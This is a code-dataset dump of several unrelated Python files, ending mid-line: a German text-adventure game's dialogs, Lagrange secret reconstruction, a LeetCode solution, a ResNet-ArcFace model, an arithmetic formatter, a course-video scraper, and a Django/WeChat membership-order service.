globals.PAUSE\n elif key in (constants.TAB, ord('i')):\n return globals.INVENTORY\n elif key == ord('h'):\n return globals.CONTROLS_MAP\n elif key in (ord('w'), constants.UP):\n self.player.position.y -= 2\n elif key in (ord('s'), constants.DOWN):\n self.player.position.y += 2\n elif key in (ord('a'), constants.LEFT):\n self.player.position.x -= 2\n elif key in (ord('d'), constants.RIGHT):\n self.player.position.x += 2\n elif key == ord('z'):\n return globals.STORY\n\n if self._last_position != self.current_position:\n if self.current_value == 'M':\n self.visit(*self.current_position)\n return globals.MONSTER\n elif self.current_value == 'I':\n return globals.ITEM\n elif self.current_value == 'X':\n return globals.SAVE_GAME\n elif self.current_value == '=':\n if self.player.level < len(self.visited):\n self.visit(*self.current_position)\n globals.LADDER.upwards = True\n return globals.LADDER\n elif self.current_value == '%':\n if self.player.level < len(self.visited):\n self.visit(*self.current_position)\n globals.LADDER.upwards = False\n return globals.LADDER\n elif self.current_value == 'O':\n if 0 <= self.player.level < len(self.visited):\n self.visit(*self.current_position)\n self.log_event('Du bist durch ein Loch gefallen')\n self.player.position.level -= 1\n return self\n\n\nclass LadderDialog(Dialog):\n\n def __init__(self):\n super().__init__()\n self.upwards = True\n self.question = ''\n self.options = ['[J] Ja', '[N] Nein']\n self.initialized = False\n self.setup()\n\n def print(self):\n if not self.initialized:\n if self.upwards:\n self.question = 'Du hast eine Leiter nach oben gefunden. ' \\\n 'Willst du sie herauf klettern?'\n else:\n self.question = 'Du hast eine Leiter nach unten gefunden. ' \\\n 'Willst du sie hinab kletern?'\n self.setup()\n self.initialized = True\n super().print()\n\n def handle(self, key: int, previous: 'UserInterface'):\n if key in (ord('j'), constants.ENTER):\n self.initialized = False\n if self.upwards:\n globals.MAP.log_event('Du bist eine Leiter hinaufgestiegen')\n globals.MAP.player.position.level += 1\n if globals.MAP.player.level not in globals.MAP.stories_shown:\n globals.MAP.stories_shown.add(globals.MAP.player.level)\n globals.STORY.text = \\\n globals.STORY.stories[str(globals.MAP.player.level)]\n return globals.STORY\n return globals.MAP\n else:\n globals.MAP.log_event('Du bist eine Leiter hinabgestiegen')\n globals.MAP.player.position.level -= 1\n return globals.MAP\n elif key == ord('n'):\n self.initialized = False\n return globals.MAP\n previous.print()\n return self\n\n\nclass SaveGameDialog(Dialog):\n \"\"\"\n Dialog when accessing a save point\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.question = \"Du kannst deinen Spielstand speichern. \" \\\n \"Dein vorheriger Spielstand wird ueberschrieben. \" \\\n \"Bist du dir sicher?\"\n self.options = [\"[J] Ja\", \"[N] Nein\"]\n self.setup()\n\n def handle(self, key: int, previous=None):\n if key == ord('n'):\n globals.MAP.log_event('Du hast das Spiel nicht gespeichert')\n return globals.MAP\n elif key in (ord('j'), constants.ENTER):\n globals.MAP.save_game()\n globals.MAP.log_event('Du hast das Spiel gespeichert')\n return globals.MAP\n globals.MAP.print()\n return self\n\n\nclass MonsterDialog(Dialog):\n \"\"\"\n Dialog when encountering a monster\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.initialized = False\n self.question = ''\n self.options = [\"[ENTER] OK\"]\n self.setup()\n\n def print(self):\n if not self.initialized:\n self.initialize()\n self.initialized = True\n super().print()\n\n def handle(self, key: int, previous=None):\n if key == constants.ENTER:\n self.initialized = False\n return globals.MAP\n globals.MAP.print()\n return self\n\n def initialize(self):\n player = globals.MAP.player\n monster = globals.MAP.monsters[(player.level,\n *globals.MAP.current_position)]\n\n self.question = f'Du kaempfst gegen das Monster:\\n{monster}\\n' \\\n f'Staerke: {monster.strength}'\n\n if player.strength >= monster.strength:\n self.question += '\\nUnd du besiegst es!'\n globals.MAP.log_event(f'{monster.name.title()} wurde besiegt!')\n globals.MAP.current_value = ' '\n globals.MAP.levels[player.level][globals.MAP._last_position[1]][\n globals.MAP._last_position[0]] = 'I'\n globals.MAP.items[(player.level, *globals.MAP._last_position)] = \\\n random.choice((Consumable, Equipment,\n Weapon))(player.level + 1)\n else:\n damage = int(player.strength / monster.strength * player.strength)\n self.question += '\\nUnd das Monster besiegt dich...'\n self.question += f'\\nDu hast {damage} Schaden ausgeteilt'\n globals.MAP.log_event(f'{monster.name.title()} '\n f'hat dich besiegt...')\n globals.MAP.player.damage += monster.strength - player.strength\n globals.MAP.monsters[(player.level, player.x,\n player.y)].strength -= damage\n\n globals.MAP.player.position._x, globals.MAP.player.position._y = \\\n globals.MAP.starting_positions[player.level]\n self.setup()\n\n\nclass ItemDialog(Dialog):\n\n def __init__(self):\n super().__init__()\n self.initialized = False\n self.question = ''\n self.item = None\n self.options = ['[J] Aufnehmen', '[N] Liegen lassen']\n self.setup()\n\n def print(self):\n if not self.initialized:\n self.initialize()\n self.initialized = True\n super().print()\n\n def handle(self, key: int, previous: 'UserInterface'):\n if key in (ord('j'), constants.ENTER):\n self.initialized = False\n globals.MAP.player.add_item(self.item)\n globals.MAP.current_value = ' '\n globals.MAP.log_event(f'Du hast {self.item} aufgenommen')\n return previous\n if key == ord('n'):\n self.initialized = False\n globals.MAP.log_event(f'Du hast {self.item} liegen lassen')\n return previous\n previous.print()\n return self\n\n def initialize(self):\n self.item = globals.MAP.items[(globals.MAP.player.level,\n *globals.MAP.current_position)]\n\n self.question = 'Du hast einen Gegenstand gefunden!\\n' \\\n f'Name: {self.item}\\n' \\\n f'Staerke: {self.item.factor}'\n self.options = ['[J] Aufnehmen', '[N] Liegen lassen']\n other_item = None\n if self.item.type == 'Kopf':\n other_item = globals.MAP.player.head\n elif self.item.type == 'Brust':\n other_item = globals.MAP.player.chest\n elif self.item.type == 'Beine':\n other_item = globals.MAP.player.legs\n elif self.item.type == 'Fuesse':\n other_item = globals.MAP.player.feet\n elif self.item.type == 'Waffe':\n other_item = globals.MAP.player.weapon\n elif self.item.type == 'Keks' and len(globals.MAP.player.cookies) > 2:\n other_item = globals.MAP.player.cookies[0]\n if other_item:\n self.question += f'\\nDu hast bereits diesen Gegenstand:\\n' \\\n f'Name: {other_item}\\n' \\\n f'Staerke: {other_item.factor}'\n self.options[0] = '[J] Austauschen'\n self.setup()\n\n\nclass GameOverDialog(Dialog):\n def __init__(self):\n super().__init__()\n self.question = 'Du bist gestorben\\nGame Over'\n self.options = ['[O] OK']\n self.setup()\n\n def handle(self, key: int, previous: 'UserInterface'):\n if key == ord('o'):\n globals.MAP = GameMap()\n return globals.MAIN\n previous.print()\n return self\n","sub_path":"src/game_map.py","file_name":"game_map.py","file_ext":"py","file_size_in_byte":24793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"73003329","text":"from functools import reduce\n\nfrom modules import utils\n\n\ndef lambda_eval(i, lst, p, flag=False):\n \"\"\" Lagrange interpolation\n return lambda(0)\n \"\"\"\n num = []\n den = []\n for element in lst:\n if element != i:\n num.append(element)\n den.append(element - i)\n\n eval_num = reduce(lambda x, y: x * y, num)\n eval_den = reduce(lambda x, y: x * y, den)\n\n if not flag:\n if eval_den < 0:\n eval_den = p - abs(eval_den)\n\n return (eval_num * utils.mult_inv(eval_den, p)) % p\n\n return eval_num * p // eval_den # p is delta\n\n\ndef reconstruct_secret(dict, p):\n sum = 0\n for node, share in dict.items():\n sum += lambda_eval(node, dict.keys(), p) * share\n\n return sum % p\n","sub_path":"modules/lagr_interpolate.py","file_name":"lagr_interpolate.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"477949135","text":"\n# 方法一:通过滑动窗口的方法实现\nclass Solution:\n def lengthOfLongestSubstring(self, s):\n if not s:\n return 0\n \n left = 0\n # set() 函数创建一个无序不重复元素集,可进行关系测试,删除重复数据,还可以计算交集、差集、并集等。\n lookup = set() \n n = len(s)\n max_len = 0\n cur_len = 0\n for i in range(n):\n cur_len += 1\n while s[i] in lookup:\n lookup.remove(s[left])\n left += 1\n cur_len -= 1\n if cur_len > max_len:\n max_len = cur_len\n lookup.add(s[i])\n return max_len\n\n\n# 方法二:通过哈希表的方法实现\n# class Solution(object):\n# def lengthOfLongestSubstring(self, s):\n# \"\"\"\n# :type s: str\n# :rtype: int\n# \"\"\"\n# dic = {}\n# l, res = 0, 0\n# for r in range(len(s)):\n# if s[r] in dic:\n# l = max(dic[s[r]], l)\n# dic[s[r]] = r + 1\n# res = max(res, r - l + 1)\n# return res\n\n\nif __name__ == '__main__':\n sovle = Solution()\n print(sovle.lengthOfLongestSubstring('abcabcbb'))\n ","sub_path":"1-20/003-无重复字符的最长子串/3_lengthOfLongestSubstring.py","file_name":"3_lengthOfLongestSubstring.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"293659342","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 20 20:28:41 2018\n\n@author: junyang\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nfrom net_ArcFace import ArcFace\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.bn0 = nn.BatchNorm2d(inplanes,eps=1e-03) \n self.conv1 = conv3x3(inplanes, planes, 1)\n self.bn1 = nn.BatchNorm2d(planes,eps=1e-03)\n self.relu = nn.PReLU()\n self.conv2 = conv3x3(planes, planes, stride)\n self.bn2 = nn.BatchNorm2d(planes,eps=1e-03)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n out =self.bn0(x)\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n #out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes,eps=1e-03)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes,eps=1e-03)\n self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(planes * 4,eps=1e-03)\n self.relu = nn.PReLU()\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, layers, num_classes=1000):\n self.inplanes = 64\n super(ResNet, self).__init__()\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = nn.BatchNorm2d(64,eps=1e-03)\n self.relu = nn.PReLU()\n #self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0], stride=2)\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n self.bn2 = nn.BatchNorm2d(512,eps=1e-03)\n self.dropout = nn.Dropout2d(p=0.4, inplace=True)\n self.fc1 = nn.Linear(512 * 7 * 7, 512)\n self.bn3 = nn.BatchNorm1d(512,eps=1e-03)\n self.fc2 = ArcFace(512,num_classes)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(planes * block.expansion,eps=1e-03),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x, label):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n #x = self.maxpool(x)\n\n x = self.layer1(x)\n #print('layer1: ',x.size())\n x = self.layer2(x)\n #print('layer2: ',x.size())\n x = self.layer3(x)\n #print('layer3: ',x.size())\n x = self.layer4(x)\n #print('layer4: ',x.size())\n\n x = self.bn2(x)\n x = self.dropout(x)\n #print('dropout: ',x.size())\n x = x.view(x.size(0),-1)\n x = self.fc1(x)\n #print('fc1: ',x.size())\n x = self.bn3(x)\n x = self.fc2(x,label)\n #print('fc2: ',x.size())\n\n return x\n\n\n\n\ndef resnet34(**kwargs):\n \"\"\"Constructs a ResNet-34 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(BasicBlock, [3, 4, 6, 3], **kwargs)\n return model\n\n\"\"\"\na = resnet34()\nprint(a)\nfrom torch.autograd import Variable\nx = Variable(torch.randn(20,3,224,224))\nout = a(x)\n\"\"\"\n","sub_path":"Resnet34_test_cfp/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"349413969","text":"def sort(List):\n k=len(List)-1\n insert=k\n for i in range(len(List)-2):\n if List[i][0]List[k][0]:\n insert=i+1\n lis=List[k]\n for i in range(insert+1,len(List)):\n List[len(List)+insert-i]=List[len(List)+insert-i-1]\n List[insert]=lis\n return List\n\ndef Func(List):\n for i in range(len(List)):\n for j in range(i+1,len(List)):\n if List[i][0]<=List[j][0] and List[j][1]<=List[i][1]:\n List.remove(List[j])\n return Func(List)\n if List[j][0]<=List[i][0] and List[j][1]>=List[i][1]:\n List.remove(List[i])\n return Func(List)\n if List[i][0]<=List[j][1] and List[i][1]>=List[j][0]:\n if List[i][0] 4 or len(problem[2]) > 4:\n raise BaseException\n except:\n return \"Error: Numbers cannot be more than four digits.\"\n\n #Check if operator is valid\n try:\n if problem[1] != '+' and problem[1] != '-':\n raise BaseException\n except:\n return \"Error: Operator must be '+' or '-'.\"\n\n #Return True if data is validated\n return True\n\ndef arithmetic_arranger(problems, showAnswer=False):\n arranged_problems = 0\n line1=line2=line3=line4 = \"\"\n problem_gap = \" \" * 4 \n #Check Problem Count\n try:\n if len(problems) > 5:\n raise BaseException\n except:\n return \"Error: Too many problems.\"\n\n #Handle each problem\n for problem in problems:\n part = problem.split()\n #Validate problems\n valid = validate_data(part)\n if valid != True:\n return valid\n\n #Arrange Problems \n space = max(len(part[0]),len(part[2])) + 2\n if len(line1) > 0:\n line1 += problem_gap\n line2 += problem_gap\n line3 += problem_gap\n\n line1 += part[0].rjust(space)\n line2 += part[1] + part[2].rjust(space-1)\n line3 += '-' * (space)\n\n #If showAnswer is true\n if showAnswer:\n #Perform math\n if part[1] == '+':\n solution = int(part[0]) + int(part[2])\n else:\n solution = int(part[0]) - int(part[2])\n \n if len(line4) > 0:\n line4 += problem_gap\n line4 += str(solution).rjust(space)\n\n #Return Arranged Problems\n arranged_problems = f\"{line1}\\n{line2}\\n{line3}\"\n if showAnswer:\n arranged_problems += f\"\\n{line4}\"\n return arranged_problems","sub_path":"arithmetic_arranger.py","file_name":"arithmetic_arranger.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"536997664","text":"# class Linyu(object):\n#\n# hobby = 'mmp'\n#\n# def __init__(self, name, age, weight):\n# self.name = name\n# self._age = age\n# self.__weight = weight\n#\n#\n# @classmethod#调用的时候用类名 , 而不是某个对象\n# def get_hobby(cls):\n# return cls.hobby\n#\n#\n# @property #像访问属性一样 调用方法\n# def get_weight(self):\n# return self.__weight\n#\n#\n# def self_intro(self):\n# print('My name is %s \\n I am %s years old \\n' % (self.name, self._age))\n#\n#\n#\n#\n# if __name__ == '__main__':\n# linyu = Linyu('石世伟', '20', '65')\n# print(dir(linyu))\n# print(linyu.get_hobby())\n# print(linyu.get_weight)\n# linyu.self_intro()\n# encoding:utf-8\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nfrom multiprocessing.pool import Pool\n\n\nclass MaiZi():\n def __init__(self):\n self.url = 'http://www.maiziedu.com/course/957/ '\n\n # 解析url的函数\n def parse_next_url(self):\n request = requests.get(self.url)\n request.encoding = request.apparent_encoding\n for url in BeautifulSoup(request.text, 'lxml').select('ul.lesson-lists li a'):\n next_url = 'http://www.maiziedu.com/ ' + url['href']\n yield next_url\n\n # 解析内容的url\n def parse_content(self, url):\n request = requests.get(url)\n request.encoding = request.apparent_encoding\n demo = '\\$lessonUrl = \"(.*?)\"'\n de = re.compile(demo, re.S)\n url_next = de.findall(request.text)[0]\n content = requests.get(url_next).content\n title = BeautifulSoup(request.text, 'lxml').select('span.selected')[0]['name']\n print(title)\n with open('D:\\\\' + title + '.mp4', 'wb') as e:\n e.write(content)\n\n # 线程\n def parse_pool(self):\n pool = Pool(2)\n pool.map(self.parse_content, self.parse_next_url())\n\n\nif __name__ == '__main__':\n Run = MaiZi()\n Run.parse_pool()\n","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"494540410","text":"import collections\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal\nfrom django.core.cache import cache\n\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\nfrom django.db.models import Prefetch\n\nfrom upday.models import StudentAssociatorShip, Associator, AssociatorOrder, UserCard, AssociatorEntry, Project, Coupon, \\\n StudentCouponShip, PunchRecord\nfrom upday.modules.channel.service.project_channel_service import ProjectChannelService\nfrom upday.modules.common.service.cache_service import key_handler\nfrom upday.modules.common.service.datetime_service import DatetimeService\nfrom upday.modules.common.service.encrypt_service import EncryptService\nfrom upday.modules.common.service.file_service import FileService\nfrom upday.modules.common.service.url_service import UrlService\nfrom upday.modules.tasker.rule import scheduler\nfrom upday.modules.wechat.service.message_service import MessageService\nfrom upday.modules.wechat.service.order_service import OrderService\nfrom upday.modules.channel.service.channel_service import ChannelService\n\n\nclass AssociatorService:\n\n def create(self, team):\n associator = Associator(\n team=team\n )\n associator.save()\n return associator\n\n def bind(self, student, associator):\n try:\n ship = StudentAssociatorShip.objects.get(student=student, associator=associator)\n except MultipleObjectsReturned:\n return False\n except ObjectDoesNotExist:\n ship = StudentAssociatorShip(student=student, associator=associator)\n ship.save()\n ship.exit_time = ship.join_time + timedelta(days=365)\n ship.save()\n return True\n # 学生是否曾参加会员但已过期失效\n if AssociatorService().is_expired_ship(ship):\n now = DatetimeService.now()\n ship.join_time = now\n ship.exit_time = now + timedelta(days=365)\n ship.save()\n return True\n ship_id = StudentAssociatorShip.objects.filter(student=student, associator=associator)[0].id\n ship_id = EncryptService().encrypt_id('HASH_KEY_STUDENT_ASSOCIATOR_ID', ship_id)\n msg = 'The StudentAssociatorShip is existed, id: ' + str(ship_id)\n raise Exception(msg)\n\n def get_student_usercard_set(self, student):\n # 取出该学生已参加的所有会员项目,预加载出项目、punchrecord_list(按两种不同的条件取出,并起了别名all_punchrecord_list和finished_punchrecord_list,set变成了list)\n my_project_list = []\n usercard_set = student.usercard_set.filter(status=1).select_related('project').prefetch_related(\n Prefetch('punchrecord_set', to_attr='all_punchrecord_list'),\n Prefetch('punchrecord_set', queryset=PunchRecord.objects.exclude(status=0), to_attr='finished_punchrecord_list'))\n for usercard in usercard_set:\n my_project_list.append(usercard.project)\n return my_project_list, usercard_set\n\n def get_final_url_from_entry(self, is_associator, entry, my_project_list, usercard_set):\n # 若学生没参加会员,url传空字符串\n if is_associator == 0:\n url = ''\n has_joined = 0\n return url, has_joined\n # 若学生参加了会员,无论是否过期,都返回条目详情。\n # 若条目绑定了project,传project的url;若无,传link;若都无,传空字符串。\n current_project = entry.project\n if current_project:\n url = ChannelService.get_common_channel_link('', EncryptService().encrypt_id('HASH_KEY_PROJECT_ID',\n current_project.id))\n if current_project in my_project_list:\n has_joined = 1\n user_card = usercard_set.get(project=entry.project)\n punch_day = len(user_card.all_punchrecord_list)\n real_punch_day = len(user_card.finished_punchrecord_list)\n if punch_day == real_punch_day:\n has_joined = 2\n else:\n has_joined = 0\n return url, has_joined\n entry_link = entry.link\n if entry_link != '':\n url = entry_link\n has_joined = 0\n return url, has_joined\n return '', 0\n\n def get_associator_entry_list(self, associator_album, is_associator, my_project_list, usercard_set):\n associator_entry_list = []\n # 取出会员专辑内所有项目\n for associator_entry in associator_album.associatorentry_set.select_related('project').order_by('position'):\n picture = FileService().sign_url(associator_entry.picture)\n url, has_joined = self.get_final_url_from_entry(\n is_associator=is_associator,\n entry=associator_entry,\n my_project_list=my_project_list,\n usercard_set=usercard_set,\n )\n dict = {\n 'url': url,\n 'has_joined': has_joined,\n 'name': associator_entry.name,\n 'price': associator_entry.price,\n 'picture': picture,\n 'introduce': associator_entry.introduce,\n }\n associator_entry_list.append(dict)\n return associator_entry_list\n\n # 根据name查询会员是否存在\n def is_existed(self, name):\n return Associator.objects.filter(name=name).count() > 0\n\n def send_bind_associator_message(self, name, time_end, associator_id, openid):\n # 延时发消息\n scheduler.event_bound_associator(openid, associator_id)\n encrypt_handler = EncryptService()\n associator_id = encrypt_handler.encrypt_id('HASH_KEY_ASSOCIATOR_ID', associator_id)\n url = ChannelService().get_associator_link(associator_id)\n message_handler = MessageService()\n # 获取模板信息\n template_data, template_id = message_handler.get_bind_associator_template(name, time_end)\n # 发送模板消息\n message_handler.send_template(user_id=openid, template_id=template_id,\n data=template_data, url=url)\n\n # 更新会员信息\n def update_associator(self, validated_data):\n associator = validated_data['associator']\n associator.name = validated_data['name']\n associator.present_price = validated_data['present_price']\n associator.origin_price = validated_data['origin_price']\n if validated_data['picture']:\n associator.picture = validated_data['picture']\n if validated_data['voice']:\n associator.voice = validated_data['voice']\n if validated_data['qrcode']:\n associator.qrcode = validated_data['qrcode']\n if validated_data['benefit']:\n associator.benefit = validated_data['benefit']\n if validated_data['introduction']:\n associator.introduction = validated_data['introduction']\n if validated_data['training']:\n associator.training = validated_data['training']\n associator.save()\n key = key_handler.get_real_associator_detail_key(associator.id)\n cache.delete(key)\n key = key_handler.get_fake_associator_detail_key(associator.id)\n cache.delete(key)\n return associator\n\n # 查询某种特定会员ID的学生数量\n def count_join_num(self, associator):\n return StudentAssociatorShip.objects.filter(associator=associator).count()\n\n # 删除会员(注意:已经有人报名的会员不能通过此接口删除)\n def delete_associator(self, associator):\n if associator.students.count() >= 1:\n msg = 'Warning! There are some students join this associator, you can not delete it'\n raise Exception(msg)\n else:\n associator.delete()\n\n # 查询团队中的会员列表\n def find_all_associator(self, team):\n associator_set = Associator.objects.filter(team=team).order_by('-create_time')\n return associator_set\n\n def get_associator(self, validated_data):\n instance = Associator.objects.get(id=validated_data['associator_id'])\n return instance\n\n def is_order_exists(self, out_trade_no, openid, total_fee, trade_type):\n try:\n order = AssociatorOrder.objects.get(out_trade_no=out_trade_no, pay_status=0)\n except MultipleObjectsReturned:\n return False\n except ObjectDoesNotExist:\n return False\n return order\n # if order.student.openid == openid and int(order.total_fee * 100) == int(\n # total_fee) and order.trade_type == trade_type:\n # return order\n # else:\n # return False\n\n def get_associator_list(self, student):\n \"\"\"\n 为什么先算学生的会员,自己慢慢体会\n :param student:\n :return:\n \"\"\"\n return student.associator_set.prefetch_related('associatoralbum_set__associatorentry_set')\n\n def complete_order(self, order, transaction_id, time_end, is_subscribe, bank_type, settlement_total_fee, fee_type):\n order.transaction_id = transaction_id\n order.time_end = time_end\n order.is_subscribe = is_subscribe\n order.bank_type = bank_type\n order.settlement_total_fee = settlement_total_fee\n order.fee_type = fee_type\n order.pay_status = 1\n order.save()\n return True\n\n # 解绑通过会员免费报名的项目\n def unbind_project(self, project_list, student, time_end):\n \"\"\"\n :param upday_id: 所有的orion_upday_item_id\n :param uid:\n :param time_end: AssociatorOrder表里的time_end(支付完成时间)时间戳,为防止将购买会员之前就已经购买的项目也\\\n 删除掉,通过时间筛选掉这部分,只将参加会员后的会员项目解绑。\n :return:\n \"\"\"\n for project in project_list:\n target_card = UserCard.objects.filter(project=project, create_at__gt=time_end, student=student)\n target_card.update(status=0)\n pass\n\n def clear_associator_detail_cache(self, associator):\n key = key_handler.get_real_associator_detail_key(associator.id)\n cache.delete(key)\n key = key_handler.get_fake_associator_detail_key(associator.id)\n cache.delete(key)\n\n def is_expired_ship(self, ship):\n # 会员的失效时间\n # expire_time_stamp = DatetimeService.get_timestamp_from_utc_datetime(expire_time)\n # 会员是否已过期失效\n # now_stamp = DatetimeService.get_current_timestamp()\n if ship.exit_time < DatetimeService.now():\n return True\n else:\n return False\n\n def is_associator_expired(self, associator, student):\n try:\n student_associator_ship = StudentAssociatorShip.objects.get(associator=associator, student=student)\n except ObjectDoesNotExist:\n msg = {'result': 'No such a student_associator_ship'}\n raise Exception(msg, code='validation')\n except MultipleObjectsReturned:\n msg = {'result': 'Multiple student_associator_ship'}\n raise Exception(msg, code='validation')\n return self.is_expired_ship(student_associator_ship)\n\n def get_joined_associator_list(self, student_associator_ship_set):\n associator_list = []\n for ship in student_associator_ship_set:\n dict = {\n 'associator_id': EncryptService().encrypt_id('HASH_KEY_ASSOCIATOR_ID', ship.associator.id),\n 'name': ship.associator.name\n }\n associator_list.append(dict)\n return associator_list\n\n #################################################################################\n # 以下为生成商户订单功能\n #################################################################################\n\n # 商户订单的out_trade_no\n def create_out_trade_no(self):\n order_service_handler = OrderService()\n return order_service_handler.generate_out_trade_no()\n\n # 商户订单中的商品描述\n def create_body(self, associator):\n name = associator.name\n price = associator.present_price\n body = \"\"\"声德:{associator_name}(¥{associator_price})\"\"\".format(\n associator_name=name,\n associator_price=price\n )\n return body\n\n # 获得回调url\n def get_wechat_pay_notify_url(self):\n return 'https://' + settings.OPEN_UPDAY_DOMAIN + '/media-platform/associator/pay-callback'\n # return 'http://milk345.imwork.net:45992/api/associator/pay-callback'\n\n # 生成ip\n def get_client_ip(self, request):\n try:\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n except Exception:\n ip = '0.0.0.0'\n return ip\n\n # 下载订单Excel\n def generate_order_excel(self, order_list):\n matrix = []\n for order_info in order_list:\n translated_info = collections.OrderedDict()\n order_id = order_info['order_id']\n associator_id = order_info['associator_id']\n user_id = order_info['user_id']\n nickname = order_info['nickname']\n associator_name = order_info['associator_name']\n total_fee = order_info['total_fee']\n refund_status = order_info['refund_status']\n refund_time = order_info['refund_time']\n time_end = order_info['time_end']\n if refund_time:\n refund_time = DatetimeService.get_represent_from_timestamp(refund_time)\n else:\n refund_time = ''\n if time_end:\n time_end = DatetimeService.get_represent_from_timestamp(time_end)\n else:\n time_end = ''\n channel = order_info['channel']\n refund_operator = order_info['refund_operator']\n refund_reason = order_info['refund_reason']\n translated_info['订单号'] = order_id\n translated_info['会员ID'] = associator_id\n translated_info['用户ID'] = user_id\n translated_info['用户昵称'] = nickname\n translated_info['会员身份'] = associator_name\n translated_info['订单金额'] = total_fee\n translated_info['退款状态'] = refund_status\n translated_info['退款时间'] = refund_time\n translated_info['支付时间'] = time_end\n translated_info['报名渠道'] = channel\n translated_info['退款人'] = refund_operator\n translated_info['退款原因'] = refund_reason\n matrix.append(translated_info)\n file_handler = FileService()\n return file_handler.create_downloadable_excel(matrix)\n\n # 按照特定的昵称,会员身份,订单金额等条件去查询\n def search_order(self, order_set, nickname, associator_name, total_fee, refund_status, refund_time_scope,\n pay_time_scope, channel, refund_operator):\n if nickname:\n order_set = self.search_order_by_nickname(order_set, nickname)\n if associator_name:\n order_set = self.search_order_by_associator_name(order_set, associator_name)\n if total_fee:\n order_set = self.search_order_by_total_fee(order_set, total_fee)\n if pay_time_scope:\n order_set = self.search_order_by_pay_time(order_set, pay_time_scope)\n if channel:\n order_set = self.search_order_by_channel(order_set, channel)\n if refund_operator:\n order_set = self.search_order_by_operator(order_set, refund_operator)\n if refund_status == 1:\n order_set = self.search_order_by_refund_status(order_set, refund_status)\n if refund_time_scope:\n order_set = self.search_order_by_refund_time(order_set, refund_time_scope)\n if refund_status == 0:\n order_set = self.search_order_by_refund_status(order_set, refund_status)\n\n return order_set\n\n def search_order_by_nickname(self, original_order_set, nickname):\n return original_order_set.filter(student__nickname=nickname)\n\n def search_order_by_associator_name(self, original_order_set, associator_name):\n return original_order_set.filter(associator__name=associator_name)\n\n def search_order_by_total_fee(self, original_order_set, total_fee):\n return original_order_set.filter(total_fee=total_fee)\n\n def search_order_by_refund_status(self, original_order_set, refund_status):\n return original_order_set.filter(refund_status=refund_status)\n\n def search_order_by_channel(self, original_order_set, channel):\n return original_order_set.filter(channel__mark=channel)\n\n def search_order_by_operator(self, original_order_set, refund_operator):\n return original_order_set.filter(refund_operator__username=refund_operator)\n\n def search_order_by_refund_time(self, original_order_set, refund_time_scope):\n return original_order_set.filter(refund_time__range=(refund_time_scope[0], refund_time_scope[1]))\n\n def search_order_by_pay_time(self, original_order_set, pay_time_scope):\n return original_order_set.filter(time_end__range=(pay_time_scope[0], 